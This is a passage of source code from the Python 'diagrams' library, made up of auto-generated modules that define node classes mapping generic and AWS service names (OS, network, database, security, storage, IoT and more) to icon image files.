_Generic class _Os(_Generic): _type = "os" _icon_dir = "resources/generic/os" class Android(_Os): _icon = "android.png" class Centos(_Os): _icon = "centos.png" class Debian(_Os): _icon = "debian.png" class IOS(_Os): _icon = "ios.png" class LinuxGeneral(_Os): _icon = "linux-general.png" class Raspbian(_Os): _icon = "raspbian.png" class RedHat(_Os): _icon = "red-hat.png" class Suse(_Os): _icon = "suse.png" class Ubuntu(_Os): _icon = "ubuntu.png" class Windows(_Os): _icon = "windows.png" # Aliases File: diagrams/generic/virtualization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Virtualization(_Generic): _type = "virtualization" _icon_dir = "resources/generic/virtualization" class Qemu(_Virtualization): _icon = "qemu.png" class Virtualbox(_Virtualization): _icon = "virtualbox.png" class Vmware(_Virtualization): _icon = "vmware.png" class XEN(_Virtualization): _icon = "xen.png" # Aliases File: diagrams/generic/__init__.py """ Generic provides the possibility of load an image to be presented as a node. """ from diagrams import Node class _Generic(Node): provider = "generic" _icon_dir = "resources/generic" fontcolor = "#ffffff" File: diagrams/generic/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Storage(_Generic): _type = "storage" _icon_dir = "resources/generic/storage" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/generic/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Network(_Generic): _type = "network" _icon_dir = "resources/generic/network" class Firewall(_Network): _icon = "firewall.png" class Router(_Network): _icon = "router.png" class Subnet(_Network): _icon = "subnet.png" class Switch(_Network): _icon = "switch.png" class VPN(_Network): _icon = "vpn.png" # Aliases File: diagrams/generic/blank.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Blank(_Generic): _type = "blank" _icon_dir = "resources/generic/blank" class Blank(_Blank): _icon = "blank.png" # Aliases File: diagrams/generic/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Compute(_Generic): _type = "compute" _icon_dir = "resources/generic/compute" class Rack(_Compute): _icon = "rack.png" # Aliases File: diagrams/aws/enablement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Enablement(_AWS): _type = "enablement" _icon_dir = "resources/aws/enablement" class CustomerEnablement(_Enablement): _icon = "customer-enablement.png" class Iq(_Enablement): _icon = "iq.png" class ManagedServices(_Enablement): _icon = "managed-services.png" class ProfessionalServices(_Enablement): _icon = "professional-services.png" class Support(_Enablement): _icon = "support.png" # Aliases File: diagrams/aws/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Media(_AWS): _type = "media" _icon_dir = "resources/aws/media" class ElasticTranscoder(_Media): _icon = "elastic-transcoder.png" class ElementalConductor(_Media): _icon = "elemental-conductor.png" class ElementalDelta(_Media): _icon = "elemental-delta.png" class ElementalLive(_Media): _icon = "elemental-live.png" class ElementalMediaconnect(_Media): _icon = "elemental-mediaconnect.png" class ElementalMediaconvert(_Media): _icon = "elemental-mediaconvert.png" class ElementalMedialive(_Media): _icon = "elemental-medialive.png" class ElementalMediapackage(_Media): _icon = "elemental-mediapackage.png" class ElementalMediastore(_Media): _icon = "elemental-mediastore.png" class ElementalMediatailor(_Media): _icon = "elemental-mediatailor.png" class ElementalServer(_Media): _icon = "elemental-server.png" class KinesisVideoStreams(_Media): _icon = "kinesis-video-streams.png" class MediaServices(_Media): _icon = "media-services.png" # Aliases File: diagrams/aws/enduser.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Enduser(_AWS): _type = "enduser" _icon_dir = "resources/aws/enduser" class Appstream20(_Enduser): _icon = "appstream-2-0.png" class DesktopAndAppStreaming(_Enduser): _icon = "desktop-and-app-streaming.png" class Workdocs(_Enduser): _icon = "workdocs.png" class Worklink(_Enduser): _icon = "worklink.png" class Workspaces(_Enduser): _icon = "workspaces.png" # Aliases File: diagrams/aws/game.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Game(_AWS): _type = "game" _icon_dir = "resources/aws/game" class GameTech(_Game): _icon = "game-tech.png" class Gamelift(_Game): _icon = "gamelift.png" # Aliases File: diagrams/aws/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Database(_AWS): _type = "database" _icon_dir = "resources/aws/database" class AuroraInstance(_Database): _icon = "aurora-instance.png" class Aurora(_Database): _icon = "aurora.png" class DatabaseMigrationServiceDatabaseMigrationWorkflow(_Database): _icon = "database-migration-service-database-migration-workflow.png" class DatabaseMigrationService(_Database): _icon = "database-migration-service.png" class Database(_Database): _icon = "database.png" class DocumentdbMongodbCompatibility(_Database): _icon = "documentdb-mongodb-compatibility.png" class DynamodbAttribute(_Database): _icon = "dynamodb-attribute.png" class DynamodbAttributes(_Database): _icon = "dynamodb-attributes.png" class DynamodbDax(_Database): _icon = "dynamodb-dax.png" class DynamodbGlobalSecondaryIndex(_Database): _icon = "dynamodb-global-secondary-index.png" class DynamodbItem(_Database): _icon = "dynamodb-item.png" class DynamodbItems(_Database): _icon = "dynamodb-items.png" class DynamodbTable(_Database): _icon = "dynamodb-table.png" class Dynamodb(_Database): _icon = "dynamodb.png" class ElasticacheCacheNode(_Database): _icon = "elasticache-cache-node.png" class ElasticacheForMemcached(_Database): _icon = "elasticache-for-memcached.png" class ElasticacheForRedis(_Database): _icon = "elasticache-for-redis.png" class Elasticache(_Database): _icon = "elasticache.png" class KeyspacesManagedApacheCassandraService(_Database): _icon = "keyspaces-managed-apache-cassandra-service.png" class Neptune(_Database): _icon = "neptune.png" class QuantumLedgerDatabaseQldb(_Database): _icon = "quantum-ledger-database-qldb.png" class RDSInstance(_Database): _icon = "rds-instance.png" class RDSMariadbInstance(_Database): _icon = "rds-mariadb-instance.png" class RDSMysqlInstance(_Database): _icon = "rds-mysql-instance.png" class RDSOnVmware(_Database): _icon = "rds-on-vmware.png" class RDSOracleInstance(_Database): _icon = "rds-oracle-instance.png" class RDSPostgresqlInstance(_Database): _icon = "rds-postgresql-instance.png" class RDSSqlServerInstance(_Database): _icon = "rds-sql-server-instance.png" class RDS(_Database): _icon = "rds.png" class RedshiftDenseComputeNode(_Database): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Database): _icon = "redshift-dense-storage-node.png" class Redshift(_Database): _icon = "redshift.png" class Timestream(_Database): _icon = "timestream.png" # Aliases DMS = DatabaseMigrationService DocumentDB = DocumentdbMongodbCompatibility DAX = DynamodbDax DynamodbGSI = DynamodbGlobalSecondaryIndex DB = Database DDB = Dynamodb ElastiCache = Elasticache QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Security(_AWS): _type = "security" _icon_dir = "resources/aws/security" class AdConnector(_Security): _icon = "ad-connector.png" class Artifact(_Security): _icon = "artifact.png" class CertificateAuthority(_Security): _icon = "certificate-authority.png" class CertificateManager(_Security): _icon = "certificate-manager.png" class CloudDirectory(_Security): _icon = "cloud-directory.png" class Cloudhsm(_Security): _icon = "cloudhsm.png" class Cognito(_Security): _icon = "cognito.png" class Detective(_Security): _icon = "detective.png" class DirectoryService(_Security): _icon = "directory-service.png" class FirewallManager(_Security): _icon = "firewall-manager.png" class Guardduty(_Security): _icon = "guardduty.png" class IdentityAndAccessManagementIamAccessAnalyzer(_Security): _icon = "identity-and-access-management-iam-access-analyzer.png" class IdentityAndAccessManagementIamAddOn(_Security): _icon = "identity-and-access-management-iam-add-on.png" class IdentityAndAccessManagementIamAWSStsAlternate(_Security): _icon = "identity-and-access-management-iam-aws-sts-alternate.png" class IdentityAndAccessManagementIamAWSSts(_Security): _icon = "identity-and-access-management-iam-aws-sts.png" class IdentityAndAccessManagementIamDataEncryptionKey(_Security): _icon = "identity-and-access-management-iam-data-encryption-key.png" class IdentityAndAccessManagementIamEncryptedData(_Security): _icon = "identity-and-access-management-iam-encrypted-data.png" class IdentityAndAccessManagementIamLongTermSecurityCredential(_Security): _icon = "identity-and-access-management-iam-long-term-security-credential.png" class IdentityAndAccessManagementIamMfaToken(_Security): _icon = "identity-and-access-management-iam-mfa-token.png" class IdentityAndAccessManagementIamPermissions(_Security): _icon = "identity-and-access-management-iam-permissions.png" class IdentityAndAccessManagementIamRole(_Security): _icon = "identity-and-access-management-iam-role.png" class IdentityAndAccessManagementIamTemporarySecurityCredential(_Security): _icon = "identity-and-access-management-iam-temporary-security-credential.png" class IdentityAndAccessManagementIam(_Security): _icon = "identity-and-access-management-iam.png" class InspectorAgent(_Security): _icon = "inspector-agent.png" class Inspector(_Security): _icon = "inspector.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class Macie(_Security): _icon = "macie.png" class ManagedMicrosoftAd(_Security): _icon = "managed-microsoft-ad.png" class ResourceAccessManager(_Security): _icon = "resource-access-manager.png" class SecretsManager(_Security): _icon = "secrets-manager.png" class SecurityHubFinding(_Security): _icon = "security-hub-finding.png" class SecurityHub(_Security): _icon = "security-hub.png" class SecurityIdentityAndCompliance(_Security): _icon = "security-identity-and-compliance.png" class ShieldAdvanced(_Security): _icon = "shield-advanced.png" class Shield(_Security): _icon = "shield.png" class SimpleAd(_Security): _icon = "simple-ad.png" class SingleSignOn(_Security): _icon = "single-sign-on.png" class WAFFilteringRule(_Security): _icon = "waf-filtering-rule.png" class WAF(_Security): _icon = "waf.png" # Aliases ACM = CertificateManager CloudHSM = Cloudhsm DS = DirectoryService FMS = FirewallManager IAMAccessAnalyzer = IdentityAndAccessManagementIamAccessAnalyzer IAMAWSSts = IdentityAndAccessManagementIamAWSSts IAMPermissions = IdentityAndAccessManagementIamPermissions IAMRole = IdentityAndAccessManagementIamRole IAM = IdentityAndAccessManagementIam KMS = KeyManagementService RAM = ResourceAccessManager File: diagrams/aws/satellite.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Satellite(_AWS): _type = "satellite" _icon_dir = "resources/aws/satellite" class GroundStation(_Satellite): _icon = "ground-station.png" class Satellite(_Satellite): _icon = "satellite.png" # Aliases File: diagrams/aws/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Mobile(_AWS): _type = "mobile" _icon_dir = "resources/aws/mobile" class Amplify(_Mobile): _icon = "amplify.png" class APIGatewayEndpoint(_Mobile): _icon = "api-gateway-endpoint.png" class APIGateway(_Mobile): _icon = "api-gateway.png" class Appsync(_Mobile): _icon = "appsync.png" class DeviceFarm(_Mobile): _icon = "device-farm.png" class Mobile(_Mobile): _icon = "mobile.png" class Pinpoint(_Mobile): _icon = "pinpoint.png" # Aliases File: diagrams/aws/robotics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Robotics(_AWS): _type = "robotics" _icon_dir = "resources/aws/robotics" class RobomakerCloudExtensionRos(_Robotics): _icon = "robomaker-cloud-extension-ros.png" class RobomakerDevelopmentEnvironment(_Robotics): _icon = "robomaker-development-environment.png" class RobomakerFleetManagement(_Robotics): _icon = "robomaker-fleet-management.png" class RobomakerSimulator(_Robotics): _icon = "robomaker-simulator.png" class Robomaker(_Robotics): _icon = "robomaker.png" class Robotics(_Robotics): _icon = "robotics.png" # Aliases File: diagrams/aws/__init__.py """ AWS provides a set of services for Amazon Web Service provider. """ from diagrams import Node class _AWS(Node): _provider = "aws" _icon_dir = "resources/aws" fontcolor = "#ffffff" File: diagrams/aws/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Integration(_AWS): _type = "integration" _icon_dir = "resources/aws/integration" class ApplicationIntegration(_Integration): _icon = "application-integration.png" class Appsync(_Integration): _icon = "appsync.png" class ConsoleMobileApplication(_Integration): _icon = "console-mobile-application.png" class EventResource(_Integration): _icon = "event-resource.png" class EventbridgeCustomEventBusResource(_Integration): _icon = "eventbridge-custom-event-bus-resource.png" class EventbridgeDefaultEventBusResource(_Integration): _icon = "eventbridge-default-event-bus-resource.png" class EventbridgeSaasPartnerEventBusResource(_Integration): _icon = "eventbridge-saas-partner-event-bus-resource.png" class Eventbridge(_Integration): _icon = "eventbridge.png" class ExpressWorkflows(_Integration): _icon = "express-workflows.png" class MQ(_Integration): _icon = "mq.png" class SimpleNotificationServiceSnsEmailNotification(_Integration): _icon = "simple-notification-service-sns-email-notification.png" class SimpleNotificationServiceSnsHttpNotification(_Integration): _icon = "simple-notification-service-sns-http-notification.png" class SimpleNotificationServiceSnsTopic(_Integration): _icon = "simple-notification-service-sns-topic.png" class SimpleNotificationServiceSns(_Integration): _icon = "simple-notification-service-sns.png" class SimpleQueueServiceSqsMessage(_Integration): _icon = "simple-queue-service-sqs-message.png" class SimpleQueueServiceSqsQueue(_Integration): _icon = "simple-queue-service-sqs-queue.png" class SimpleQueueServiceSqs(_Integration): _icon = "simple-queue-service-sqs.png" class StepFunctions(_Integration): _icon = "step-functions.png" # Aliases SNS = SimpleNotificationServiceSns SQS = SimpleQueueServiceSqs SF = StepFunctions File: diagrams/aws/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _ML(_AWS): _type = "ml" _icon_dir = "resources/aws/ml" class ApacheMxnetOnAWS(_ML): _icon = "apache-mxnet-on-aws.png" class AugmentedAi(_ML): _icon = "augmented-ai.png" class Comprehend(_ML): _icon = "comprehend.png" class DeepLearningAmis(_ML): _icon = "deep-learning-amis.png" class DeepLearningContainers(_ML): _icon = "deep-learning-containers.png" class Deepcomposer(_ML): _icon = "deepcomposer.png" class Deeplens(_ML): _icon = "deeplens.png" class Deepracer(_ML): _icon = "deepracer.png" class ElasticInference(_ML): _icon = "elastic-inference.png" class Forecast(_ML): _icon = "forecast.png" class FraudDetector(_ML): _icon = "fraud-detector.png" class Kendra(_ML): _icon = "kendra.png" class Lex(_ML): _icon = "lex.png" class MachineLearning(_ML): _icon = "machine-learning.png" class Personalize(_ML): _icon = "personalize.png" class Polly(_ML): _icon = "polly.png" class RekognitionImage(_ML): _icon = "rekognition-image.png" class RekognitionVideo(_ML): _icon = "rekognition-video.png" class Rekognition(_ML): _icon = "rekognition.png" class SagemakerGroundTruth(_ML): _icon = "sagemaker-ground-truth.png" class SagemakerModel(_ML): _icon = "sagemaker-model.png" class SagemakerNotebook(_ML): _icon = "sagemaker-notebook.png" class SagemakerTrainingJob(_ML): _icon = "sagemaker-training-job.png" class Sagemaker(_ML): _icon = "sagemaker.png" class TensorflowOnAWS(_ML): _icon = "tensorflow-on-aws.png" class Textract(_ML): _icon = "textract.png" class Transcribe(_ML): _icon = "transcribe.png" class Translate(_ML): _icon = "translate.png" # Aliases DLC = DeepLearningContainers File: diagrams/aws/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Devtools(_AWS): _type = "devtools" _icon_dir = "resources/aws/devtools" class CloudDevelopmentKit(_Devtools): _icon = "cloud-development-kit.png" class Cloud9Resource(_Devtools): _icon = "cloud9-resource.png" class Cloud9(_Devtools): _icon = "cloud9.png" class Codebuild(_Devtools): _icon = "codebuild.png" class Codecommit(_Devtools): _icon = "codecommit.png" class Codedeploy(_Devtools): _icon = "codedeploy.png" class Codepipeline(_Devtools): _icon = "codepipeline.png" class Codestar(_Devtools): _icon = "codestar.png" class CommandLineInterface(_Devtools): _icon = "command-line-interface.png" class DeveloperTools(_Devtools): _icon = "developer-tools.png" class ToolsAndSdks(_Devtools): _icon = "tools-and-sdks.png" class XRay(_Devtools): _icon = "x-ray.png" # Aliases CLI = CommandLineInterface DevTools = DeveloperTools File: diagrams/aws/business.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Business(_AWS): _type = "business" _icon_dir = "resources/aws/business" class AlexaForBusiness(_Business): _icon = "alexa-for-business.png" class BusinessApplications(_Business): _icon = "business-applications.png" class Chime(_Business): _icon = "chime.png" class Workmail(_Business): _icon = "workmail.png" # Aliases A4B = AlexaForBusiness File: diagrams/aws/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Storage(_AWS): _type = "storage" _icon_dir = "resources/aws/storage" class Backup(_Storage): _icon = "backup.png" class CloudendureDisasterRecovery(_Storage): _icon = "cloudendure-disaster-recovery.png" class EFSInfrequentaccessPrimaryBg(_Storage): _icon = "efs-infrequentaccess-primary-bg.png" class EFSStandardPrimaryBg(_Storage): _icon = "efs-standard-primary-bg.png" class ElasticBlockStoreEBSSnapshot(_Storage): _icon = "elastic-block-store-ebs-snapshot.png" class ElasticBlockStoreEBSVolume(_Storage): _icon = "elastic-block-store-ebs-volume.png" class ElasticBlockStoreEBS(_Storage): _icon = "elastic-block-store-ebs.png" class ElasticFileSystemEFSFileSystem(_Storage): _icon = "elastic-file-system-efs-file-system.png" class ElasticFileSystemEFS(_Storage): _icon = "elastic-file-system-efs.png" class FsxForLustre(_Storage): _icon = "fsx-for-lustre.png" class FsxForWindowsFileServer(_Storage): _icon = "fsx-for-windows-file-server.png" class Fsx(_Storage): _icon = "fsx.png" class MultipleVolumesResource(_Storage): _icon = "multiple-volumes-resource.png" class S3GlacierArchive(_Storage): _icon = "s3-glacier-archive.png" class S3GlacierVault(_Storage): _icon = "s3-glacier-vault.png" class S3Glacier(_Storage): _icon = "s3-glacier.png" class SimpleStorageServiceS3BucketWithObjects(_Storage): _icon = "simple-storage-service-s3-bucket-with-objects.png" class SimpleStorageServiceS3Bucket(_Storage): _icon = "simple-storage-service-s3-bucket.png" class SimpleStorageServiceS3Object(_Storage): _icon = "simple-storage-service-s3-object.png" class SimpleStorageServiceS3(_Storage): _icon = "simple-storage-service-s3.png" class SnowFamilySnowballImportExport(_Storage): _icon = "snow-family-snowball-import-export.png" class SnowballEdge(_Storage): _icon = "snowball-edge.png" class Snowball(_Storage): _icon = "snowball.png" class Snowmobile(_Storage): _icon = "snowmobile.png" class StorageGatewayCachedVolume(_Storage): _icon = "storage-gateway-cached-volume.png" class StorageGatewayNonCachedVolume(_Storage): _icon = "storage-gateway-non-cached-volume.png" class StorageGatewayVirtualTapeLibrary(_Storage): _icon = "storage-gateway-virtual-tape-library.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" class Storage(_Storage): _icon = "storage.png" # Aliases CDR = CloudendureDisasterRecovery EBS = ElasticBlockStoreEBS EFS = ElasticFileSystemEFS FSx = Fsx S3 = SimpleStorageServiceS3 File: diagrams/aws/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Network(_AWS): _type = "network" _icon_dir = "resources/aws/network" class APIGatewayEndpoint(_Network): _icon = "api-gateway-endpoint.png" class APIGateway(_Network): _icon = "api-gateway.png" class AppMesh(_Network): _icon = "app-mesh.png" class ClientVpn(_Network): _icon = "client-vpn.png" class CloudMap(_Network): _icon = "cloud-map.png" class CloudFrontDownloadDistribution(_Network): _icon = "cloudfront-download-distribution.png" class CloudFrontEdgeLocation(_Network): _icon = "cloudfront-edge-location.png" class CloudFrontStreamingDistribution(_Network): _icon = "cloudfront-streaming-distribution.png" class CloudFront(_Network): _icon = "cloudfront.png" class DirectConnect(_Network): _icon = "direct-connect.png" class ElasticLoadBalancing(_Network): _icon = "elastic-load-balancing.png" class ElbApplicationLoadBalancer(_Network): _icon = "elb-application-load-balancer.png" class ElbClassicLoadBalancer(_Network): _icon = "elb-classic-load-balancer.png" class ElbNetworkLoadBalancer(_Network): _icon = "elb-network-load-balancer.png" class Endpoint(_Network): _icon = "endpoint.png" class GlobalAccelerator(_Network): _icon = "global-accelerator.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class Nacl(_Network): _icon = "nacl.png" class NATGateway(_Network): _icon = "nat-gateway.png" class NetworkingAndContentDelivery(_Network): _icon = "networking-and-content-delivery.png" class PrivateSubnet(_Network): _icon = "private-subnet.png" class Privatelink(_Network): _icon = "privatelink.png" class PublicSubnet(_Network): _icon = "public-subnet.png" class Route53HostedZone(_Network): _icon = "route-53-hosted-zone.png" class Route53(_Network): _icon = "route-53.png" class RouteTable(_Network): _icon = "route-table.png" class SiteToSiteVpn(_Network): _icon = "site-to-site-vpn.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class VPCCustomerGateway(_Network): _icon = "vpc-customer-gateway.png" class VPCElasticNetworkAdapter(_Network): _icon = "vpc-elastic-network-adapter.png" class VPCElasticNetworkInterface(_Network): _icon = "vpc-elastic-network-interface.png" class VPCFlowLogs(_Network): _icon = "vpc-flow-logs.png" class VPCPeering(_Network): _icon = "vpc-peering.png" class VPCRouter(_Network): _icon = "vpc-router.png" class VPCTrafficMirroring(_Network): _icon = "vpc-traffic-mirroring.png" class VPC(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CF = CloudFront ELB = ElasticLoadBalancing ALB = ElbApplicationLoadBalancer CLB = ElbClassicLoadBalancer NLB = ElbNetworkLoadBalancer GAX = GlobalAccelerator File: diagrams/aws/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Management(_AWS): _type = "management" _icon_dir = "resources/aws/management" class AutoScaling(_Management): _icon = "auto-scaling.png" class Chatbot(_Management): _icon = "chatbot.png" class CloudformationChangeSet(_Management): _icon = "cloudformation-change-set.png" class CloudformationStack(_Management): _icon = "cloudformation-stack.png" class CloudformationTemplate(_Management): _icon = "cloudformation-template.png" class Cloudformation(_Management): _icon = "cloudformation.png" class Cloudtrail(_Management): _icon = "cloudtrail.png" class CloudwatchAlarm(_Management): _icon = "cloudwatch-alarm.png" class CloudwatchEventEventBased(_Management): _icon = "cloudwatch-event-event-based.png" class CloudwatchEventTimeBased(_Management): _icon = "cloudwatch-event-time-based.png" class CloudwatchRule(_Management): _icon = "cloudwatch-rule.png" class Cloudwatch(_Management): _icon = "cloudwatch.png" class Codeguru(_Management): _icon = "codeguru.png" class CommandLineInterface(_Management): _icon = "command-line-interface.png" class Config(_Management): _icon = "config.png" class ControlTower(_Management): _icon = "control-tower.png" class LicenseManager(_Management): _icon = "license-manager.png" class ManagedServices(_Management): _icon = "managed-services.png" class ManagementAndGovernance(_Management): _icon = "management-and-governance.png" class ManagementConsole(_Management): _icon = "management-console.png" class OpsworksApps(_Management): _icon = "opsworks-apps.png" class OpsworksDeployments(_Management): _icon = "opsworks-deployments.png" class OpsworksInstances(_Management): _icon = "opsworks-instances.png" class OpsworksLayers(_Management): _icon = "opsworks-layers.png" class OpsworksMonitoring(_Management): _icon = "opsworks-monitoring.png" class OpsworksPermissions(_Management): _icon = "opsworks-permissions.png" class OpsworksResources(_Management): _icon = "opsworks-resources.png" class OpsworksStack(_Management): _icon = "opsworks-stack.png" class Opsworks(_Management): _icon = "opsworks.png" class OrganizationsAccount(_Management): _icon = "organizations-account.png" class OrganizationsOrganizationalUnit(_Management): _icon = "organizations-organizational-unit.png" class Organizations(_Management): _icon = "organizations.png" class PersonalHealthDashboard(_Management): _icon = "personal-health-dashboard.png" class ServiceCatalog(_Management): _icon = "service-catalog.png" class SystemsManagerAutomation(_Management): _icon = "systems-manager-automation.png" class SystemsManagerDocuments(_Management): _icon = "systems-manager-documents.png" class SystemsManagerInventory(_Management): _icon = "systems-manager-inventory.png" class SystemsManagerMaintenanceWindows(_Management): _icon = "systems-manager-maintenance-windows.png" class SystemsManagerOpscenter(_Management): _icon = "systems-manager-opscenter.png" class SystemsManagerParameterStore(_Management): _icon = "systems-manager-parameter-store.png" class SystemsManagerPatchManager(_Management): _icon = "systems-manager-patch-manager.png" class SystemsManagerRunCommand(_Management): _icon = "systems-manager-run-command.png" class SystemsManagerStateManager(_Management): _icon = "systems-manager-state-manager.png" class SystemsManager(_Management): _icon = "systems-manager.png" class TrustedAdvisorChecklistCost(_Management): _icon = "trusted-advisor-checklist-cost.png" class TrustedAdvisorChecklistFaultTolerant(_Management): _icon = "trusted-advisor-checklist-fault-tolerant.png" class TrustedAdvisorChecklistPerformance(_Management): _icon = "trusted-advisor-checklist-performance.png" class TrustedAdvisorChecklistSecurity(_Management): _icon = "trusted-advisor-checklist-security.png" class TrustedAdvisorChecklist(_Management): _icon = "trusted-advisor-checklist.png" class TrustedAdvisor(_Management): _icon = "trusted-advisor.png" class WellArchitectedTool(_Management): _icon = "well-architected-tool.png" # Aliases SSM = SystemsManager ParameterStore = SystemsManagerParameterStore File: diagrams/aws/ar.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Ar(_AWS): _type = "ar" _icon_dir = "resources/aws/ar" class ArVr(_Ar): _icon = "ar-vr.png" class Sumerian(_Ar): _icon = "sumerian.png" # Aliases File: diagrams/aws/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Blockchain(_AWS): _type = "blockchain" _icon_dir = "resources/aws/blockchain" class BlockchainResource(_Blockchain): _icon = "blockchain-resource.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class ManagedBlockchain(_Blockchain): _icon = "managed-blockchain.png" class QuantumLedgerDatabaseQldb(_Blockchain): _icon = "quantum-ledger-database-qldb.png" # Aliases QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Analytics(_AWS): _type = "analytics" _icon_dir = "resources/aws/analytics" class Analytics(_Analytics): _icon = "analytics.png" class Athena(_Analytics): _icon = "athena.png" class CloudsearchSearchDocuments(_Analytics): _icon = "cloudsearch-search-documents.png" class Cloudsearch(_Analytics): _icon = "cloudsearch.png" class DataLakeResource(_Analytics): _icon = "data-lake-resource.png" class DataPipeline(_Analytics): _icon = "data-pipeline.png" class ElasticsearchService(_Analytics): _icon = "elasticsearch-service.png" class EMRCluster(_Analytics): _icon = "emr-cluster.png" class EMREngineMaprM3(_Analytics): _icon = "emr-engine-mapr-m3.png" class EMREngineMaprM5(_Analytics): _icon = "emr-engine-mapr-m5.png" class EMREngineMaprM7(_Analytics): _icon = "emr-engine-mapr-m7.png" class EMREngine(_Analytics): _icon = "emr-engine.png" class EMRHdfsCluster(_Analytics): _icon = "emr-hdfs-cluster.png" class EMR(_Analytics): _icon = "emr.png" class GlueCrawlers(_Analytics): _icon = "glue-crawlers.png" class GlueDataCatalog(_Analytics): _icon = "glue-data-catalog.png" class Glue(_Analytics): _icon = "glue.png" class KinesisDataAnalytics(_Analytics): _icon = "kinesis-data-analytics.png" class KinesisDataFirehose(_Analytics): _icon = "kinesis-data-firehose.png" class KinesisDataStreams(_Analytics): _icon = "kinesis-data-streams.png" class KinesisVideoStreams(_Analytics): _icon = "kinesis-video-streams.png" class Kinesis(_Analytics): _icon = "kinesis.png" class LakeFormation(_Analytics): _icon = "lake-formation.png" class ManagedStreamingForKafka(_Analytics): _icon = "managed-streaming-for-kafka.png" class Quicksight(_Analytics): _icon = "quicksight.png" class RedshiftDenseComputeNode(_Analytics): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Analytics): _icon = "redshift-dense-storage-node.png" class Redshift(_Analytics): _icon = "redshift.png" # Aliases ES = ElasticsearchService File: diagrams/aws/quantum.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Quantum(_AWS): _type = "quantum" _icon_dir = "resources/aws/quantum" class Braket(_Quantum): _icon = "braket.png" class QuantumTechnologies(_Quantum): _icon = "quantum-technologies.png" # Aliases File: diagrams/aws/cost.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Cost(_AWS): _type = "cost" _icon_dir = "resources/aws/cost" class Budgets(_Cost): _icon = "budgets.png" class CostAndUsageReport(_Cost): _icon = "cost-and-usage-report.png" class CostExplorer(_Cost): _icon = "cost-explorer.png" class CostManagement(_Cost): _icon = "cost-management.png" class ReservedInstanceReporting(_Cost): _icon = "reserved-instance-reporting.png" class SavingsPlans(_Cost): _icon = "savings-plans.png" # Aliases File: diagrams/aws/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Migration(_AWS): _type = "migration" _icon_dir = "resources/aws/migration" class ApplicationDiscoveryService(_Migration): _icon = "application-discovery-service.png" class CloudendureMigration(_Migration): _icon = "cloudendure-migration.png" class DatabaseMigrationService(_Migration): _icon = "database-migration-service.png" class DatasyncAgent(_Migration): _icon = "datasync-agent.png" class Datasync(_Migration): _icon = "datasync.png" class MigrationAndTransfer(_Migration): _icon = "migration-and-transfer.png" class MigrationHub(_Migration): _icon = "migration-hub.png" class ServerMigrationService(_Migration): _icon = "server-migration-service.png" class SnowballEdge(_Migration): _icon = "snowball-edge.png" class Snowball(_Migration): _icon = "snowball.png" class Snowmobile(_Migration): _icon = "snowmobile.png" class TransferForSftp(_Migration): _icon = "transfer-for-sftp.png" # Aliases ADS = ApplicationDiscoveryService CEM = CloudendureMigration DMS = DatabaseMigrationService MAT = MigrationAndTransfer SMS = ServerMigrationService File: diagrams/aws/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Iot(_AWS): _type = "iot" _icon_dir = "resources/aws/iot" class Freertos(_Iot): _icon = "freertos.png" class InternetOfThings(_Iot): _icon = "internet-of-things.png" class Iot1Click(_Iot): _icon = "iot-1-click.png" class IotAction(_Iot): _icon = "iot-action.png" class IotActuator(_Iot): _icon = "iot-actuator.png" class IotAlexaEcho(_Iot): _icon = "iot-alexa-echo.png" class IotAlexaEnabledDevice(_Iot): _icon = "iot-alexa-enabled-device.png" class IotAlexaSkill(_Iot): _icon = "iot-alexa-skill.png" class IotAlexaVoiceService(_Iot): _icon = "iot-alexa-voice-service.png" class IotAnalyticsChannel(_Iot): _icon = "iot-analytics-channel.png" class IotAnalyticsDataSet(_Iot): _icon = "iot-analytics-data-set.png" class IotAnalyticsDataStore(_Iot): _icon = "iot-analytics-data-store.png" class IotAnalyticsNotebook(_Iot): _icon = "iot-analytics-notebook.png" class IotAnalyticsPipeline(_Iot): _icon = 